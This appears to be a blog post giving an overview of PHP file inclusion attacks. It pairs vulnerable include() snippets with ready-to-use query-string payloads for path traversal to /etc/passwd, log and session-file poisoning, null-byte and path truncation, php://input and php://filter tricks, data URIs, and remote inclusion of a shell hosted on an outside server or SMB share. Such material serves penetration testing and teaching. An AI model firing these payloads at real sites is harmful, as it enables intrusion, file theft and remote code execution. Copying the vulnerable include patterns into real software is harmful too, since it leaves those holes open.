Exploiting PHP File Inclusion – Overview

Recently I see a lot of questions regarding PHP File Inclusions and the possibilities you have. So I decided to give a small overview. All the tricks have been described in detail somewhere earlier, but I like it to have them summed up at one place.

Basic Local File Inclusion:

<?php include("inc/" . $_GET['file']); ?>

• Including files in the same directory:
  ?file=.htaccess
• Path Traversal:
  ?file=../../../../../../../../../var/lib/locate.db
  (this file is very interesting because it lets you search the filesystem, other files)
• Including injected PHP code:
  ?file=../../../../../../../../../var/log/apache/error.log
  Tricks:
  • list of possible Apache dirs
  • include access log from file descriptor /proc/self/fd/XX
  • include more info from the proc file system
  • include email log files
  • include ssh auth.log
  • abuse avatar/image/attachment file uploads
  • include session files
  • include PHP’s temporarily uploaded files
  • If you additionally have a phpinfo() output, read here.

  Limited Local File Inclusion:

  <?php include("inc/" . $_GET['file'] . ".htm"); ?>

  • Null Byte Injection:
    ?file=../../../../../../../../../etc/passwd%00
    (requires magic_quotes_gpc=off)
  • Directory Listing with Null Byte Injection:
    ?file=../../../../../../../../../var/www/accounts/%00
    (UFS filesystem only, requires magic_quotes_gpc=off, more details here)
  • Path Truncation:
    ?file=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
    (more details see here and here)
  • Dot Truncation:
    ?file=../../../../../../../../../etc/passwd……………. …
    (Windows only, more details here)
  • Reverse Path Truncation:
    ?file=../../../../ […] ../../../../../etc/passwd
    (more details here)

  Basic Remote File Inclusion

  <?php include($_GET['file']); ?>

  • Including Remote Code:
    ?file=[http|https|ftp]://websec.wordpress.com/shell.txt
    (requires allow_url_fopen=On and allow_url_include=On)
  • Using PHP stream php://input:
    ?file=php://input
    (specify your payload in the POST parameters, watch urlencoding, details here, requires allow_url_include=On)
  • Using PHP stream php://filter:
    ?file=php://filter/convert.base64-encode/resource=index.php
    (lets you read PHP source because it wont get evaluated in base64. More details here and here)

  • Using data URIs:
    ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
    (requires allow_url_include=On)
  • Using XSS:
    ?file=http://127.0.0.1/path/xss.php?xss=phpcode
    (makes sense if firewalled or only whitelisted domains allowed)

  Limited Remote File Inclusion

  <?php include($_GET['file'] . ".htm"); ?>

  • ?file=https://websec.wordpress.com/shell
  • ?file=https://websec.wordpress.com/shell.txt?
  • ?file=https://websec.wordpress.com/shell.txt%23

  (requires allow_url_fopen=On and allow_url_include=On)

  • ?file=\\evilshare\shell.php

  (bypasses allow_url_fopen=Off)

  Static Remote File Inclusion:

  <?php include("http://192.168.1.10/config.php"); ?>

  • Man In The Middle
    (lame indeed, but often forgotten)

  Filter evasion

  • Access files with wildcards (read more here)

  Of course you can combine all the tricks. If you are aware of any other or interesting files to include please leave a comment and I’ll add them.